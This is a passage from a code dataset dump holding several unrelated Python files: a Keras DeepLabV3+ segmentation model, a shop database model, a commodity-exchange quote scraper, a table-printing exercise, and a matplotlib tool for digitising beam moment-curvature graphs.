(video_codec, audio_codec, pathtofile))\n self.convertfile(os.path.join(pathtofile))\n print(\" - convert completed for %s\" % pathtofile)\n converted = True\n else:\n converted = False\n print(\" - skipping %s\" % pathtofile)\n\nx = Converter()\nfor show in x.getlistofshows():\n x.check_convert_need(show)\n\n\n\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336327559","text":"from keras.layers import (\n Activation,\n Conv2D,\n MaxPooling2D,\n BatchNormalization,\n Input,\n DepthwiseConv2D,\n add,\n Dropout,\n AveragePooling2D,\n Concatenate,\n LeakyReLU,\n)\nimport tensorflow as tf\nfrom keras.models import Model\nimport keras.backend as K\nfrom keras.engine import Layer, InputSpec\nfrom keras.utils import conv_utils\nfrom keras.backend.common import normalize_data_format\n\nrate_LRelu = 0.01\n\n# Force Keras to use 16 bits to free up more memory at the expense of training time.\ndtype = \"float16\"\n# K.set_floatx(dtype)\n\n\nclass BilinearUpsampling(Layer):\n def __init__(self, upsampling=(2, 2), data_format=None, **kwargs):\n \"\"\"\n During its instantiation, it require two up sampling parameter.\n :param upsampling:\n :param data_format:\n :param kwargs:\n \"\"\"\n super(BilinearUpsampling, self).__init__(**kwargs)\n self.data_format = normalize_data_format(data_format)\n self.upsampling = conv_utils.normalize_tuple(upsampling, 2, \"size\")\n self.input_spec = InputSpec(ndim=4)\n\n def compute_output_shape(self, input_shape):\n height = (\n self.upsampling[0] * input_shape[1] if input_shape[1] is not None else None\n )\n width = (\n self.upsampling[1] * input_shape[2] if input_shape[2] is not None else None\n )\n return (input_shape[0], height, width, input_shape[3])\n\n def call(self, inputs):\n return tf.image.resize_bilinear(\n inputs,\n (\n int(inputs.shape[1] * self.upsampling[0]),\n int(inputs.shape[2] * self.upsampling[1]),\n ),\n )\n\n def get_config(self):\n config = {\"size\": self.upsampling, \"data_format\": self.data_format}\n base_config = super(BilinearUpsampling, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\ndef xception_downsample_block(x, channels, is_top_relu=False):\n \"\"\"\n Xception Downsample block??? built using TensorFlor/Keras Functional API\n :param x:\n :param channels: key parameter that determine how many POINTWISE convolution happens.\n :param is_top_relu:\n :return:\n \"\"\"\n ##Original Depthwise, Separable ConvStack1:fewer connections, lighter model. I wonder if these can be swapped out for modified version.\n if is_top_relu:\n x = LeakyReLU(alpha=rate_LRelu)(x)\n # DepthwiseConv2D does Conv2D in EACH channel/depth domain (i.e. RGB in color images).\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n # Pointwise Convolution to change the dimension for let's say x*y*5 to x*y*3\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n ##Depthwise, Separable ConvStack2\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n ##Depthwise, Separable ConvStack3, with downsampling stride! NOTICE THE STRIDES! This is where the DOWNSAMPLING happens.\n x = DepthwiseConv2D((3, 3), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n return x\n\n\ndef res_xception_downsample_block(x, channels):\n \"\"\"\n Where Residual block post convolution is COMBINED to the Xception downsample block\n :param x:\n :param channels:\n :return:\n \"\"\"\n # Residual connections post regular convolution 2d WITH STRIDE (downsampled)\n res = Conv2D(channels, (1, 1), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n res = BatchNormalization()(res)\n\n # Xception Downsample block (also downsampled stride 2x2 by ONCE\n x = xception_downsample_block(x, channels)\n\n # Combination of both the residual connection block and the inception downsample block.\n x = add([x, res])\n\n return x\n\n\ndef xception_block(x, channels):\n \"\"\"\n Xception block without any downsampling. Notice the LACK of strides in the 3rd separable ConvStack3\n :param x:\n :param channels:\n :return: x underwent THREE times of DepthWiseConv2D at 3x3\n \"\"\"\n ##Depthwise, Separable ConvStack1\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n\n ##Depthwise, Separable ConvStack2\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n\n ##Depthwise, Separable ConvStack3\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n return x\n\n\ndef res_xception_block(x, channels):\n \"\"\"\n Residual Xception block without downsampling.\n :param x:\n :param channels:\n :return:\n \"\"\"\n res = x\n x = xception_block(x, channels)\n x = add([x, res])\n return x\n\n\ndef aspp(x, input_shape, out_stride):\n \"\"\"\n Atrous Spatial Pyramid Pooling: aka Dilated Convolution\n :param x: the input tensor\n :param input_shape: along with out-stride determine the final returned shape.\n :param out_stride: along with input_shape determine the final returned shape.\n :return: x: the output tensor after the series of operations.\n \"\"\"\n\n print(f\"ASPP b0 Shape {K.shape(x)}\")\n\n # B0 Block: Regular convolution? No Dilation?\n b0 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n b0 = BatchNormalization()(b0)\n b0 = LeakyReLU(alpha=rate_LRelu)(b0)\n\n print(f\"ASPP b0 Shape {K.shape(b0)}\")\n\n # B1 Block: Convolution with dilation rate of 6\n b1 = DepthwiseConv2D((3, 3), dilation_rate=(6, 6), padding=\"same\", use_bias=False)(\n x\n )\n b1 = BatchNormalization()(b1)\n b1 = LeakyReLU(alpha=rate_LRelu)(b1)\n b1 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b1)\n b1 = BatchNormalization()(b1)\n b1 = LeakyReLU(alpha=rate_LRelu)(b1)\n\n print(f\"ASPP b1 Shape {K.shape(b1)}\")\n\n # B2 Block: Convolution with dilation rate of 12\n b2 = DepthwiseConv2D(\n (3, 3), dilation_rate=(12, 12), padding=\"same\", use_bias=False\n )(x)\n b2 = BatchNormalization()(b2)\n b2 = LeakyReLU(alpha=rate_LRelu)(b2)\n b2 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b2)\n b2 = BatchNormalization()(b2)\n b2 = LeakyReLU(alpha=rate_LRelu)(b2)\n\n print(f\"ASPP b2 Shape {K.shape(b2)}\")\n\n # B3 Block: Convolution with dilation rate of 12 again?? Why not using 18?\n b3 = DepthwiseConv2D(\n (3, 3), dilation_rate=(12, 12), padding=\"same\", use_bias=False\n )(x)\n b3 = BatchNormalization()(b3)\n b3 = LeakyReLU(alpha=rate_LRelu)(b3)\n b3 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b3)\n b3 = BatchNormalization()(b3)\n b3 = LeakyReLU(alpha=rate_LRelu)(b3)\n\n print(f\"ASPP b3 Shape {K.shape(b3)}\")\n\n # B4 block: ???\n out_shape1 = int(input_shape[0] / out_stride) # for x dimension\n out_shape2 = int(input_shape[1] / out_stride) # for y dimension\n b4 = AveragePooling2D(pool_size=(out_shape1, out_shape2))(x)\n b4 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b4)\n b4 = BatchNormalization()(b4)\n b4 = LeakyReLU(alpha=rate_LRelu)(b4)\n # Special B4 layers: upsampling TO the final outershape\n b4 = BilinearUpsampling((out_shape1, out_shape2))(b4)\n\n print(f\"ASPP b4 Shape {K.shape(b4)}\")\n\n # Concatenate and return all. How can they have the same shape?\n x = Concatenate()([b4, b0, b1, b2, b3])\n print(f\"ASPP Final X Shape {K.shape(x)}\")\n return x\n\n\ndef deeplabv3_plus(input_shape=(512, 512, 3), out_stride=16, num_classes=21):\n \"\"\"\n The full DeepLabV3 Architectures\n :param input_shape:\n :param out_stride:\n :param num_classes:\n :return:\n \"\"\"\n\n # Obtain the shape of the input (PER image??\n img_input = Input(shape=input_shape)\n\n x = Conv2D(32, (3, 3), strides=(2, 2), padding=\"same\", use_bias=False)(img_input)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = Conv2D(64, (3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n x = res_xception_downsample_block(x, 128)\n\n res = Conv2D(256, (1, 1), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n res = BatchNormalization()(res)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n skip = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(skip)\n x = DepthwiseConv2D((3, 3), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = add([x, res])\n\n x = xception_downsample_block(x, 728, is_top_relu=True)\n\n for i in range(16):\n x = res_xception_block(x, 728)\n\n res = Conv2D(1024, (1, 1), padding=\"same\", use_bias=False)(x)\n res = BatchNormalization()(res)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(728, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(1024, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(1024, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = add([x, res])\n\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(1536, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(1536, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(2048, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n # aspp\n x = aspp(x, input_shape, out_stride)\n x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = Dropout(0.9)(x)\n\n ##decoder\n x = BilinearUpsampling((4, 4))(x)\n dec_skip = Conv2D(48, (1, 1), padding=\"same\", use_bias=False)(skip)\n dec_skip = BatchNormalization()(dec_skip)\n dec_skip = LeakyReLU(alpha=rate_LRelu)(dec_skip)\n x = Concatenate()([x, dec_skip])\n\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n x = Conv2D(num_classes, (1, 1), padding=\"same\")(x)\n x = BilinearUpsampling((4, 4))(x)\n model = Model(img_input, x)\n return model\n\n\nif __name__ == \"__main__\":\n model = deeplabv3_plus(num_classes=1)\n model.summary()\n","sub_path":"ModelLayersSpec.py","file_name":"ModelLayersSpec.py","file_ext":"py","file_size_in_byte":12484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651678307","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n@author: delu\n@file: shop_model.py\n@time: 17/4/20 下午5:10\n\"\"\"\n\nfrom source.model import ModelBase\n\n\nclass Model(ModelBase):\n def create_shop(self, params):\n \"\"\"\n 创建店铺\n \"\"\"\n key = 'shop_id, admin_id, shop_name, logo_url'\n val = '%s, %s, %s, %s'\n value_tuple = (params['shop_id'], params['admin_id'], params['shop_name'], params['logo_url'])\n\n return self.insert('tbl_um_shop', {self.sql_constants.KEY: key,\n self.sql_constants.VAL: val}, value_tuple)\n\n def update_shop(self, params):\n \"\"\"\n 更新店铺\n :param params: \n :return: \n \"\"\"\n fields = ['shop_name = %s', 'logo = %s']\n condition = ' shop_id = %s'\n values_tuple = (params['shop_name'], params['logo'], params['shop_id'])\n\n return self.update('shops', {self.sql_constants.FIELDS: fields,\n self.sql_constants.CONDITION: condition}, values_tuple)\n\n def query_shop_count(self, params):\n \"\"\"\n 查询店铺数量\n :param params: \n :return: \n \"\"\"\n condition = ' 1 = 1 '\n value_list = []\n\n if 'shop_id' in params:\n condition += 'and shop_id = %s'\n value_list.append(params['shop_id'])\n if 'admin_id' in params:\n condition += 'and admin_id = %s'\n value_list.append(params['admin_id'])\n\n return self.get_rows('tbl_um_shop', {self.sql_constants.CONDITION: condition}, tuple(value_list))\n\n def query_shop(self, params):\n \"\"\"\n 查询店铺列表\n :param params: \n :return: \n \"\"\"\n # 查询范围\n fields = []\n # 查询条件\n condition = ' 1 = 1 '\n # 查询的值\n value_list = []\n if 'shop_id' in params and params['shop_id']:\n condition += ' and shop_id = %s '\n value_list.append(params['shop_id'])\n if 'admin_id' in params and params['admin_id']:\n condition += ' and admin_id = %s '\n value_list.append(params['admin_id'])\n return self.find('tbl_um_shop', {self.sql_constants.FIELDS: fields,\n self.sql_constants.CONDITION: condition}, tuple(value_list))\n","sub_path":"pythonWeb/wm-b2c/v1/module/shop/model/shop_model.py","file_name":"shop_model.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301867331","text":"import re\n\nimport requests\n\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\ndef get_rhq_html():\n url = 'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html'\n ua = UserAgent()\n headers = {\n 'User-Agent': ua.random,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'www.dce.com.cn',\n 'Referer':'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html'\n }\n data = {\n 'day': '07',\n 'dayQuotes.trade_type': '0',\n 'dayQuotes.variety\t':'all' ,\n 'month': '07',\n 'year':'2018',\n }\n html = requests.post(url=url,headers=headers,data=data).text\n return html\n\n\ndef parse_rhq_html(html):\n soup = BeautifulSoup(html,'lxml')\n tradeResult02 = soup.find(class_='tradeResult02')\n tr_list = tradeResult02.find_all('tr')\n for i in tr_list:\n td_list = i.find_all('td')\n new_td_list = []\n for j in td_list:\n new_td_list.append(re.sub(r'[\\n \\t \\r \\xa0]','',j.text))\n up_data(new_td_list)\ndef up_data(lists):\n if lists:\n lists = lists[0],lists[1],lists[5],lists[7],lists[10],lists[11]\n if lists[0] == '聚乙烯':\n if lists[1] == '1809':\n datas['l1809']['1809']=lists\n elif lists[1] == '1901':\n datas['l1809']['1901'] = lists\n elif lists[0] == '聚丙烯':\n if lists[1] == '1809':\n datas['pp1809']['1809']=lists\n elif lists[1] == '1901':\n datas['pp1809']['1901'] = lists\n elif lists[0] == '聚氯乙烯':\n if lists[1] == '1809':\n datas['v1809']['1809']=lists\n elif lists[1] == '1901':\n datas['v1809']['1901'] = lists\ndef qhsc(datas):\n qhsc = {'l1809':{},'v1809':{},'pp1809':{}}\n for k,v in datas.items():\n spj = v['1809'][2]\n jc = int(v['1809'][2])-int(v['1901'][2])\n jsj = v['1809'][3]\n ccl = v['1809'][5]\n # 收盘价 价差 结算价 持仓量\n qhsc[k] = [spj,jc,jsj,ccl]\n return qhsc\n\ndef get_data():\n data2 = {\n 'l': 'l1809',\n 'v': 'v1809',\n 'pp':'pp1809',\n }\n data_list = []\n for k,v in data2.items():\n data = {\n 'contract.contract_id': v,\n 'contract.variety_id': k,\n 'day': '07',\n 'memberDealPosiQuotes.trade_type': '0',\n 'memberDealPosiQuotes.variety': k,\n 'month': '07',\n 'year': '2018',\n }\n data_list.append(data)\n return data_list\n\ndef get_rph_html(data):\n url = 'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html'\n ua = UserAgent()\n headers = {\n 'User-Agent': ua.random,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'www.dce.com.cn',\n 'Referer':'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html'\n }\n html = requests.post(url=url,headers=headers,data=data).text\n return html\ndef parse_rph_html(html):\n soup = BeautifulSoup(html,'lxml')\n tradeResult02 = soup.find(class_='tradeResult02')\n tr_list = tradeResult02.find_all(name='tr')\n new_td_list = []\n for i in tr_list[-1].find_all('td'):\n new_td_list.append(re.sub(r'[\\n \\t \\r \\xa0 ,]','',i.text))\n return [new_td_list[6],new_td_list[10],int(new_td_list[6])-int(new_td_list[10])]\nif __name__ == '__main__':\n # qhsc\n # 收盘价 结算价 成交量 持仓量\n datas = {'l1809':{},'pp1809':{},'v1809':{}}\n html = get_rhq_html()\n parse_rhq_html(html)\n qhsc = qhsc(datas)\n # jcc\n data_list = get_data()\n jcc_list = []\n for i in data_list:\n html = get_rph_html(i)\n jcc = parse_rph_html(html)\n jcc_list.append(jcc)\n","sub_path":"WorksZhang/pingzhong/shuhua/dce_spider_rhq.py","file_name":"dce_spider_rhq.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294968542","text":"# This program takes lists and prints them out in a nicely formatted table.\r\n# It takes the length of lists into account, adjusts width accordingly\r\n# and prints blank when a list has no values left\r\n# while continuing to print the lists which still have values in them.\r\n\r\n\r\ndef calc_max(table):\r\n max_width = []\r\n longest_len = 0\r\n # Loop repeats for every list inside table\r\n for list_i in table:\r\n # While looping over the lists assign longest len to var\r\n if len(list_i) > longest_len:\r\n longest_len = len(list_i)\r\n # Assigns len of current lists first index to var\r\n length = len(list_i[0])\r\n # Loop repeats for each index in current list\r\n for index in list_i:\r\n # If index len is higher\r\n if len(index) > length:\r\n # Assigns higher len to var length\r\n length = len(index)\r\n # After loop; append highest len value to list width\r\n max_width.append(length)\r\n # Assigns the width list and longest_len var to a dict\r\n # so it can be used in print_table()\r\n len_width = {'max_width': max_width, 'longest_len': longest_len}\r\n return len_width\r\n\r\n\r\ndef print_table(table):\r\n # Runs calc_max() to calc max values and store them in dict\r\n len_width = calc_max(table_data)\r\n # Unpacks dict from calc_max() and assign its values to vars\r\n # width = list and contains longest string values from each list\r\n width = len_width['max_width']\r\n # length = var and contains int which represents the longest list\r\n length = len_width['longest_len']\r\n # Main loop repeats for number of indexes in longest list\r\n for index in range(0, length):\r\n # Loop repeats for number of lists present in table\r\n for list_i in range(len(table)):\r\n # Tries to print the index's values seperated by a space\r\n # and with rjust() called with the current lists index\r\n # as the width lists index\r\n try:\r\n to_print = table[list_i][index]\r\n print(to_print.rjust(width[list_i]), end=' ')\r\n # If no value present at current index; IndexError is raised\r\n # 'nothing' is printed and it continues with the next list\r\n except IndexError:\r\n print(''.rjust(width[list_i]), end=' ')\r\n # Prints the next loop on a new line\r\n print('')\r\n\r\n\r\ntable_data = [['apples', 'oranges', 'cherries', 'banana', 'pear', 'kiwi', 'peach'],\r\n ['Alice', 'Bob', 'Carol', 'David'],\r\n ['computer', 'television', 'table', 'remote', 'cup', 'couch', 'chair', 'plant'],\r\n ['candy'],\r\n ['dogs', 'cats', 'moose', 'goose', 'dolphin']]\r\n\r\nprint_table(table_data)\r\n","sub_path":"LL_table_printer.py","file_name":"LL_table_printer.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540569862","text":"import matplotlib.pyplot as plt\nimport pandas as pd \nimport numpy as np\nimport math\nimport matplotlib.patches as mpatches\nfrom graph_moment import moment_graph\nfrom PIL import Image\nimport os\nimport xlrd\nfrom xlutils.copy import copy\nfrom plastic_moment import plastic_moment\n\n\n\nclass Graphplotter:\n \"\"\"\n A cross hair cursor using blitting for faster redraw.\n \"\"\"\n def __init__(self, ax, image, scale_point, shape, row_number, v, k):\n self.scale_point, self.shape, self.v, self.k= [scale_point, shape, v, k]\n\n THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\n my_file = os.path.join(THIS_FOLDER, 'Data','beam_column_data.xlsx')\n\n book = xlrd.open_workbook(my_file)\n # get the first worksheet\n self.first_sheet = book.sheet_by_index(1)\n # read a row slice\n if row_number<100:\n row = self.first_sheet.row_slice(rowx=row_number,\n start_colx=29,\n end_colx=46)\n\n\n self.b, self.d, self.r, self.t_flange, self.t_web, self.c, self.spr, self.s_ult, self.n, self.Eel, self.s_pl, self.curve_pl = [row[2].value, row[1].value, row[4].value, row[3].value, row[3].value, row[3].value, row[9].value, row[10].value, row[13].value, row[12].value, row[15].value, row[16].value]\n else:\n row = self.first_sheet.row_slice(rowx=row_number,\n start_colx=10,\n end_colx=32)\n\n\n self.b, self.d, self.r, self.t_flange, self.t_web, self.c, self.spr, self.s_ult, self.n, self.Eel, self.s_pl, self.curve_pl = [row[1].value, row[0].value, row[4].value, row[3].value, row[2].value, row[3].value, row[15].value, row[16].value, row[17].value, row[18].value, row[20].value, row[21].value]\n if self.curve_pl==\"no data\" or self.s_pl==\"no data\":\n moment, curve = plastic_moment(shape = \"I Beam\", b = self.b, d = self.d, r = self.r, t_flange = self.t_flange, t_web = self.t_web, c = self.c, Eel = self.Eel, spr = self.spr, n = self.n, v = self.v, k = self.k)\n print(moment,curve)\n if self.curve_pl==\"no data\":\n self.curve_pl = curve\n if self.s_pl==\"no data\":\n self.s_pl = moment \n\n print(self.b, self.d, self.r, self.t_flange, self.t_web, self.c, self.spr, self.s_ult, self.n, self.Eel, self.s_pl, self.curve_pl)\n self.width, self.height = image.size\n self.ax = ax\n self.background = None\n self.horizontal_line = ax.axhline(color='k', lw=0.4, ls='--')\n self.vertical_line = ax.axvline(color='k', lw=0.4, ls='--')\n # text location in axes coordinates\n self.text = ax.text(0.72, 0.9, '')\n self._creating_background = False\n self.ratio=[1,5]\n self.points=[]\n self.pointsx=[]\n self.pointsy=[]\n self.px=[]\n self.py=[]\n self.redo_grid()\n self.first_clicks=True\n self.first_click = [0,0]\n self.second_click = [0,0]\n self.on_mouse_move(\"\",True)\n \n\n\n\n def redo_grid(self):\n self.ax.set_xlim([0,self.width])\n self.ax.set_ylim([0,self.height])\n ax.set_ylim(ax.get_ylim()[::-1])\n\n\n def on_draw(self, event):\n self.create_new_background()\n\n def set_cross_hair_visible(self, visible):\n need_redraw = self.horizontal_line.get_visible() != visible\n self.horizontal_line.set_visible(visible)\n self.vertical_line.set_visible(visible)\n self.text.set_visible(visible)\n return need_redraw\n\n def create_new_background(self):\n if self._creating_background:\n # discard calls triggered from within this function\n return\n self._creating_background = True\n self.set_cross_hair_visible(False)\n self.ax.figure.canvas.draw()\n self.background = self.ax.figure.canvas.copy_from_bbox(self.ax.bbox)\n self.set_cross_hair_visible(True)\n self._creating_background = False\n\n def drawing(self):\n self.ax.draw_artist(self.ax.scatter([self.first_click[0],self.second_click[0]],[self.first_click[1],self.second_click[1]],c='r',s=30,marker='x'))\n self.ax.draw_artist(self.ax.scatter(self.pointsx,self.pointsy,c='k',s=30,marker='x'))\n\n\n\n def on_mouse_move(self, event, initial=False):\n if self.background is None:\n self.create_new_background()\n if initial ==True:\n need_redraw = self.set_cross_hair_visible(False)\n if need_redraw:\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n self.ax.figure.canvas.blit(self.ax.bbox)\n return\n if not event.inaxes:\n need_redraw = self.set_cross_hair_visible(False)\n if need_redraw:\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n self.ax.figure.canvas.blit(self.ax.bbox)\n else:\n self.set_cross_hair_visible(True)\n # update the line positions\n x, y = event.xdata, event.ydata\n x = round(x/self.ratio[0],self.ratio[1])*self.ratio[0]\n y = round(y/self.ratio[0],self.ratio[1])*self.ratio[0]\n self.horizontal_line.set_ydata(y)\n self.vertical_line.set_xdata(x)\n self.text.set_position((x+0.1,y+0.1))\n self.text.set_text('(%1.2f, %1.2f)' % (x, y))\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n if self.points.count([x,y])!=0:\n self.ax.draw_artist(self.ax.scatter(x,y,c='y',s=20))\n if len(self.pointsx)>2.5:\n line, = self.ax.plot(self.px, self.py, 'b-')\n self.ax.draw_artist(line)\n self.ax.draw_artist(self.horizontal_line)\n self.ax.draw_artist(self.vertical_line)\n self.ax.draw_artist(self.text)\n self.ax.figure.canvas.blit(self.ax.bbox)\n\n def on_mouse_click(self, event):\n if self.background is None:\n self.create_new_background()\n if not event.inaxes:\n need_redraw = self.set_cross_hair_visible(False)\n if need_redraw:\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n self.ax.figure.canvas.blit(self.ax.bbox)\n else:\n x, y = event.xdata, event.ydata\n x = round(x/self.ratio[0],self.ratio[1])*self.ratio[0]\n y = round(y/self.ratio[0],self.ratio[1])*self.ratio[0]\n if self.first_clicks:\n if self.first_click == [0,0]:\n self.first_click=[x,y]\n else:\n self.second_click = [x,y]\n self.first_clicks = False\n else:\n self.points.append([x,y])\n self.pointsx.append(x)\n self.pointsy.append(y)\n if len(self.pointsx)>2.5:\n self.pointsnp = np.array(self.points)\n self.path = evaluate_bezier(self.pointsnp, 20)\n self.px, self.py = self.path[:,0], self.path[:,1]\n \n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n if self.points.count([x,y])!=0:\n self.ax.draw_artist(self.ax.scatter(x,y,c='y',s=20))\n if len(self.pointsx)>2.5:\n line, = self.ax.plot(self.px, self.py, 'b-')\n self.ax.draw_artist(line)\n self.ax.draw_artist(self.horizontal_line)\n self.ax.draw_artist(self.vertical_line)\n self.ax.draw_artist(self.text)\n self.ax.figure.canvas.blit(self.ax.bbox)\n self.on_mouse_move(\"\",True)\n\n def on_mouse_click2(self, event):\n x, y = event.xdata, event.ydata\n print(x,y)\n print(y*self.s_pl)\n\n\n def on_key_click(self, event):\n if event.key ==\"c\":\n self.points.pop()\n self.pointsx.pop()\n self.pointsy.pop()\n \n if event.key ==\"o\":\n if not self.first_clicks:\n x1 = self.first_click[0]\n y1 = self.first_click[1]\n x0 = self.second_click[0]\n y0 = self.second_click[1]\n self.new_points = []\n self.new_x = []\n self.new_y = []\n for p in self.points:\n self.new_points.append([self.scale_point[0]*(p[0]-x0)/(x1-x0),self.scale_point[1]*(p[1]-y0)/(y1-y0)])\n self.new_points = np.array(self.new_points)\n plt.close('all')\n fig = plt.figure(figsize=(11, 8))\n self.path = evaluate_bezier(self.new_points, 50)\n\n self.moment, self.A = moment_graph(shape = self.shape, b = self.b, d = self.d, r = self.r, t_flange = self.t_flange, t_web = self.t_web, c = self.c, Eel = self.Eel, spr = self.spr, n = self.n, v = self.v, k = self.k, last = self.new_points[-1][0], curve_pl=self.curve_pl, s_pl=self.s_pl, s_ult = False)\n\n plt.plot(self.A, self.moment, 'r-', label='Theoretical')\n dpath = derivative(self.path)\n ddpath = derivative(dpath)\n x, y = self.new_points[:,0], self.new_points[:,1]\n px, py = self.path[:,0], self.path[:,1]\n dpx, dpy = dpath[:,0], 0.0001*dpath[:,1]\n ddpx, ddpy = ddpath[:,0], 0.00000001*ddpath[:,1]\n plt.plot(px, py, 'b-', label='Moment')\n plt.ylabel('Moment / KNm')\n plt.xlabel('Curvature / rad')\n plt.grid(True,'both')\n plt.plot(dpx, dpy, 'k-',label='1st Devivative (x10^-4)')\n plt.plot(ddpx, ddpy, 'r-', label='2nd Devivative (x10^-8)')\n plt.plot(x, y, 'ko')\n fig.canvas.mpl_connect('button_press_event', graph_plotter.on_mouse_click2)\n fig.canvas.mpl_connect('key_press_event', graph_plotter.on_key_click2)\n plt.legend()\n \n plt.show()\n\n def on_key_click2(self, event):\n plt.close('all')\n fig = plt.figure(figsize=(11, 8))\n \"\"\"if event.key ==\"up\":\n 